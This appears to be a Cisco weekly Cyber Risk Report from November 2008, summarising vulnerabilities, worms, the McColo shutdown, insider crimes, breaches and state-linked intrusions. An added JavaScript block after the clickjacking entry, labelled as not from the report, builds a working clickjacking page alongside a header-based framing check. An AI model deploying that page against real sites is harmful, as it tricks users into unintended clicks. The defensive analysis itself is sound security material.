November 10–16, 2008

The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Much of the previous week's vulnerability and threat activity centered on security releases by Apple and Mozilla. Each vendor released updated versions of its web browser to address multiple vulnerabilities, many of which had not been previously disclosed. The browser is often the most exposed application on a user's system; whether at home or at work, users are advised to keep their browsers current on patches.

Microsoft released its monthly security updates, which addressed four vulnerabilities, two of them previously disclosed. Of particular interest was the SMB protocol NTLM credential handling arbitrary code execution vulnerability in Microsoft Windows, described in IntelliShield Alert 16986. This vulnerability was first reported to Microsoft in 2001 and demonstrated by the SMB Relay attack tool.
The Microsoft Security Response Center explained the delay in a blog post. At the time of disclosure, Microsoft considered any fix infeasible because it would severely impact many network-based applications, such as Outlook or Exchange. Changes made to current versions of Windows allowed Microsoft to create a fix that does not prevent those applications from functioning.

Also of interest was the memory corruption vulnerability in Microsoft XML Core Services, described in IntelliShield Alert 12620. This vulnerability was originally disclosed publicly by independent security researchers in February 2007. When it was first reported, the vulnerability was thought to be specific to the Internet Explorer web browser, but it actually affects any application that uses XML Core Services. The bulletins released by Microsoft address both of these vulnerabilities.

In malicious code activity this week, W32.Kernelbot.A received additional updates intended to evade detection; Cisco IntelliShield has observed new filenames and malicious websites being used by the worm. With these updates, the worm will likely evade detection for a short time and compromise further machines. The worm continues to exploit the Microsoft Windows Server Service remote procedure call request handling code execution vulnerability, described in IntelliShield Alert 16941, to propagate to other systems on the same network segment. To protect their environments, IntelliShield strongly encourages administrators to apply the appropriate Microsoft and Adobe updates and to ensure that virus definitions are current. The worm is described in IntelliShield Alert 16994.

IntelliShield published 112 events last week: 51 new events and 61 updated events.
Of the 112 events, 90 were Vulnerability Alerts, eight were Security Activity Bulletins, five were Security Issue Alerts, five were Malicious Code Alerts, two were Applied Mitigation Bulletins, and two were Cyber Risk Reports. The alert publication totals are as follows:

Weekly Alert Totals
Previous Alerts That Still Represent Significant Risk

Adobe Acrobat Products util.printf() Function Buffer Overflow Vulnerability
Adobe Acrobat Professional, 3D, and Standard and Adobe Reader contain a buffer overflow vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the user. A variant of the Pidief family of trojans described in IntelliShield Alert 14388 is actively exploiting this vulnerability in the wild. Adobe has confirmed the vulnerability and released updated software. Administrators are advised to apply the appropriate updates and to ensure that current antivirus definitions are installed. Users should also be cautious of unsolicited PDF files that arrive via e-mail.

Microsoft Windows Server Service Remote Procedure Call Request Handling Code Execution Vulnerability
Microsoft Windows contains a buffer overflow vulnerability that could allow an unauthenticated, remote attacker to create a denial of service condition or execute arbitrary code. Exploit code is publicly available, and the Troj/Gimmiv-A, W32.Kernelbot.A, and W32.Wecorl worms are actively exploiting this vulnerability to install themselves on target systems. Additional information on these worms is available in IntelliShield Alerts 16947, 16985, and 16994. Microsoft has confirmed the vulnerability and released software updates. Administrators are advised to apply the appropriate updates and to ensure that current antivirus definitions are installed.

Microsoft Windows Internet Printing Protocol Remote Code Execution Vulnerability
Microsoft Windows contains a vulnerability in Internet Printing Protocol (IPP) request processing that could allow a remote attacker to execute arbitrary code. Only systems that have IIS installed with Internet Printing support are vulnerable. Internet Printing is not installed by default on Windows Vista, Windows Server 2003, or Windows Server 2008.
When IIS is installed on Windows 2000 and Windows XP systems, Internet Printing is enabled by default. Functional exploit code is available, and this vulnerability is being actively exploited. Microsoft has confirmed this vulnerability in a security bulletin and released software updates.

Multiple Browsers and Adobe Flash Player Mouse Click Hijacking Vulnerability
Independent security researchers have discovered a critical flaw that affects multiple commonly used web browsers and Adobe Flash Player. If an attacker can convince a user to visit a malicious web page, the attacker can control where the user's mouse clicks land, fooling the user into believing he or she is clicking on a legitimate link. The attacker controls a hidden HTML layer that actually receives the clicks, so the user unknowingly follows invisible links or activates invisible controls. This type of exploit is being referred to as clickjacking. Adobe has released both a security advisory and a security bulletin as well as updated software to address this vulnerability.

Sockstress Exploit Tool Exposes Vulnerabilities in TCP Stack Implementations of Multiple Vendors
Independent security researchers developed the sockstress tool, which exposes vulnerabilities in the TCP stack implementations of multiple vendors. The researchers have not yet publicly released the tool, and few technical details of the associated vulnerabilities are publicly available. The researchers are coordinating the release of details to affected vendors through Funet CERT of Finland. They presented their findings, with few details, on October 17, 2008 at the T2 2008 security conference in Helsinki, Finland. Cisco has released a Security Response for this activity.
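The clickjacking entry above describes the trick in prose. The following JavaScript (Node.js) is an added example, not code from the report or from any browser or Adobe advisory: it builds the attacker page (a visible decoy button over a transparent, offset iframe of the target) and checks whether a target's response headers would stop a browser from framing it. The function names and the sample bank URL are assumptions. The header check relies on X-Frame-Options and CSP frame-ancestors, both of which postdate this report (X-Frame-Options shipped with Internet Explorer 8 in 2009); in 2008 the available defense was frame-busting script, included last with its known weakness.

```javascript
'use strict';
// Added example: build a clickjacking page and check framing protections.
// Not from the report or from any vendor advisory.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Attacker page: a visible decoy button at (100,100) and the target page in a
// large iframe that is fully transparent (opacity:0, so it still receives
// clicks, unlike display:none) and stacked on top (z-index). The iframe is
// shifted by the target control's position so that control sits exactly under
// the decoy; a click on "the button" lands on the target's control.
function buildClickjackPage({ targetUrl, decoyText, controlX, controlY, width = 120, height = 32 }) {
  const left = 100 - controlX;
  const top = 100 - controlY;
  return [
    '<!doctype html>',
    '<html><body>',
    `<button style="position:absolute;left:100px;top:100px;width:${width}px;height:${height}px">${escapeHtml(decoyText)}</button>`,
    `<iframe src="${escapeHtml(targetUrl)}" scrolling="no" style="position:absolute;left:${left}px;top:${top}px;width:2000px;height:2000px;opacity:0;z-index:10;border:0"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Defender's check: would a browser honouring X-Frame-Options / CSP
// frame-ancestors refuse to render the target inside a page from
// framerOrigin? Origins are compared as exact strings, a simplification of
// the real source-matching rules.
function framingBlocked(headers, targetOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const csp = h['content-security-policy'];
  if (csp) {
    const dir = csp.split(';').map(s => s.trim()).find(s => /^frame-ancestors\b/i.test(s));
    if (dir) { // frame-ancestors, when present, overrides X-Frame-Options
      const sources = dir.split(/\s+/).slice(1).map(s => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return true;
      if (sources.includes('*')) return false;
      if (sources.includes('self') && framerOrigin === targetOrigin) return false;
      return !sources.includes(framerOrigin.toLowerCase());
    }
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return true;
  if (xfo === 'SAMEORIGIN') return framerOrigin !== targetOrigin;
  return false; // nothing prevents framing
}

// The 2008-era client-side defence. A hostile framer can defeat it, for
// example by loading the target in a sandboxed iframe without allow-scripts
// so the script never runs, which is why header-based controls are preferred.
function frameBustingSnippet() {
  return '<script>if (top !== self) { top.location = self.location; }</script>';
}
```

Save the output of buildClickjackPage to an HTML file and open it in a browser to see the decoy; set opacity to 0.5 in the string to see the target page sitting over it. framingBlocked is the check to run against a site's own response headers, not against the attacker page.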
Citect CitectSCADA and CitectFacilities ODBC Service Buffer Overflow Vulnerability
Citect CitectSCADA contains a vulnerability that could allow a remote attacker to cause a DoS condition or execute arbitrary code. Exploit code that could allow code execution is available. The vulnerable applications provide remote SQL access to a relational database through the ODBC server component. Such systems should be contained in their own network and never connected to corporate networks or exposed to the Internet. An attacker who can reach the network on which these machines reside must still connect to the TCP port that the ODBC service uses.

Physical

Network Administrator Convicted on Numerous Charges
On Friday, November 7, 2008, Andrew Madrid, a former network administrator in San Jose, CA, pleaded guilty to numerous charges for offenses committed from September 2006 through March 2008, including hacking into servers, identity theft, burglary, and drug charges. The victims' names are currently being withheld. Ben Field, a deputy district attorney in the Santa Clara District Attorney's office, said this case "was one of the most sophisticated computer crimes" the office has prosecuted. Madrid posed as a legitimate security guard or IT employee to obtain physical access to companies, and he also found unattended security badges in plain sight in office cubicles. Other crimes consisted of swapping bar codes on store products to pay a lower price and possession of methamphetamine. He faces a sentence of 6 to 12 years, to be determined on January 22, 2009.

IntelliShield Analysis: This breach illustrates how important it is to control access, to question anyone unfamiliar in an office building, and to maintain physical possession of passcards.
Physical security is commonly overlooked when protecting offices, data centers, and buildings, often for the sake of convenience. Signage, perimeter fencing, and detective controls such as cameras and security guards can help control access to and movement within the office area. Organizations are advised to require inspectors, work crews, and visitors to be escorted through the premises despite the inconvenience, and to authenticate unannounced visitors before allowing access to facilities. In addition, employees should never leave security badges unattended or in unlocked containers.

Legal

Malicious Internet Service Provider McColo Shut Down
Internet service provider (ISP) McColo was shut down on Tuesday, November 11, 2008 by its upstream providers, Hurricane Electric and Global Crossing, after extensive analysis by several Internet security researchers. McColo was based in San Jose, California and was reportedly hosting botnet command-and-control servers, malware distribution sites, rogue security software, cybercrime affiliate payment systems, and child pornography websites. The IronPort Threat Operations Center has reported a major decline in spam volume as a result of this shutdown: spam activity decreased from approximately 190 billion total messages per day in October to 112 billion on November 11. Further information is available in IntelliShield Alert 17068. McColo came back online on November 15 through TeliaSonera, a Swedish ISP.

IntelliShield Analysis: Security professionals and law enforcement have helped upstream providers decide to disconnect ISPs suspected of harboring illicit activity. The researchers and law enforcement agencies involved gathered evidence, built their case, and presented it to the network providers of the suspected ISP.
The providers, in this case Hurricane Electric and Global Crossing, used this information to perform their own analysis, which led to the termination of the malicious ISP's connectivity. The security community relies on the involvement of upstream providers to shut down the infrastructure that enables malicious ISPs. Those providers cannot readily identify such activity on their own: they may have several thousand customers, and monitoring for malicious activity is often not feasible at the traffic volumes they handle. Before a security event that requires a coordinated response or law enforcement involvement occurs, customers are encouraged to develop close working relationships with their ISPs and with law enforcement, and to understand their service-level agreement (SLA) and what steps their ISP can and will take.

Laid-Off System Administrator Arrested on Charges of Extortion
A system administrator who had been laid off from an unnamed mutual fund company has been arrested on two charges under the federal cyberextortion statute. He is accused of sending e-mail messages to his former employer threatening to damage its computer systems unless it improved his severance package and gave him excellent references. After the first e-mail, the company contacted law enforcement. At the request of the investigators, the employer recorded two subsequent phone calls from the former employee, in which he threatened to enlist hacker friends to break into the company's computers and to inform the media about any damage he caused. Police arrested him at his home on November 10.

IntelliShield Analysis: In the current financial crisis, employee layoffs are increasing. This stressful environment could also produce a growing number of disgruntled employees who attempt malicious actions against current or former employers.
However, the company in question handled the situation well. It locked the former employee out of company systems, so that any attempt to do damage would have required him to break in illegally, and it alerted the police as soon as it received the first threatening message. By working with the police, the employer had the man arrested within 4 days of the initial threat and avoided any damage to company systems.

Trust

VISA Europe Trials New PIN Cards
First announced in June, new personal identification number (PIN) credit and debit cards are now undergoing trials by VISA Europe in cooperation with MBNA Bank, Corner Bank, Cal, and IW Bank. The cards integrate a PIN generator on the back, which creates a one-time PIN for each transaction. To obtain the one-time PIN, the user enters his or her personal PIN into the generator. By producing a single-use PIN, the card promises to improve the security of online transactions. The lifetime of the cards' electronic components is said to be 3 years.

IntelliShield Analysis: This technology could help defeat some types of credit card fraud, such as theft of card numbers or cards, by requiring a user not only to hold the card number but also to enter a personal PIN in order to generate the one-time PINs. The one-time PIN also improves security by ensuring that the user's personal PIN is never transmitted over the web. If a card is lost or stolen, the generator still protects it as long as the generation scheme is a secure one-way function and the personal PIN used to unlock the generator cannot be recovered from the card itself and then used to obtain one-time PINs.
Identity

University of Florida Announces Dental Patient Data Breach
The University of Florida recently notified 330,000 current and former patients that their sensitive information was compromised. This information includes names, addresses, birth dates, Social Security numbers, and possibly dental procedure records. The compromise was discovered by an IT staff member on October 3, 2008 while upgrading the server. No identity theft has been reported, but those at risk were notified and instructed to watch for signs of malicious activity.

IntelliShield Analysis: The university is working with the United States Federal Bureau of Investigation and local police to investigate the incident. To help prevent incidents of this kind, organizations are encouraged to increase monitoring of data flows. Compromises of this type have continued for some time, and breaches at universities and large corporations have largely failed to produce increased security measures or legislation to prevent them. A complex combination of controls may be needed, but the central step is to identify where sensitive information is stored and how it moves from that point.

Human

Spammers Need Only One in 12,500,000 to Respond
Researchers from the University of California at Berkeley and the University of California at San Diego have released a study based on monitoring spam sent through the Storm botnet. Initial findings indicate that spammers need only a very small fraction of recipients, one in 12,500,000, to respond for the activity to be profitable. The researchers took control of some compromised systems in the botnet and used them to send typical spam messages and monitor the responses.
IntelliShield Analysis: Some of the initially released data in this study seems questionable, but it still reinforces what previous studies, security professionals, and law enforcement have established: spammers need only a tiny response rate to make their operations highly profitable. Despite our best technology, user awareness campaigns, and spam controls, efforts against spam will have limited success as long as criminals need only a very small percentage of users to respond. The risk-to-reward ratio of spamming remains well in the spammers' favor. Law enforcement has focused on this problem and continues to increase investigation and prosecution of these criminal organizations; that pressure is the lever that can tilt the risk-to-reward ratio against the spammers. Businesses are encouraged to continue using strong measures to limit spam, and also to cooperate with law enforcement in identifying and prosecuting the criminal organizations behind spamming and other illegal activities.

Geopolitical

Hackers Outside United States Target Presidential Campaign and White House Systems
Press reports have surfaced recently claiming that United States (U.S.) White House e-mail systems have been compromised repeatedly by hackers whose activity originates from servers in China. In each case, unclassified e-mail messages between lower-level U.S. government officials appear to have been accessed. Separately, according to a Newsweek report, the two leading U.S. presidential candidates, Senators Obama and McCain, were informed by Federal Bureau of Investigation and Secret Service officials in August that their campaign websites had been hacked and that large amounts of sensitive policy-planning information had been downloaded to foreign servers.
Although the nationality of the hackers was not disclosed, security firms hired by the campaigns speculated that the intrusions originated in either Russia or China.

IntelliShield Analysis: Given the targeted nature and sophistication of the intrusions, the White House e-mail access appears to have been for intelligence gathering. Less is known about the hacks on the McCain and Obama websites, but state-sponsored hackers may have been looking for confidential policy notes that could give foreign governments an early advantage in negotiating with the incoming administration. Some press reports recalled the "grains of sand" approach sometimes used in intelligence collection, in which many people review large quantities of low-sensitivity information looking for valuable material. Information security specialists may wish to use these incidents as a reminder that low-sensitivity information will be targeted if its protection is less robust than that given to genuinely classified information.

Upcoming Security Activity

Computer Security Institute 2008: November 15–21, 2008

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

Thanksgiving (United States): November 27, 2008

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use.
Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.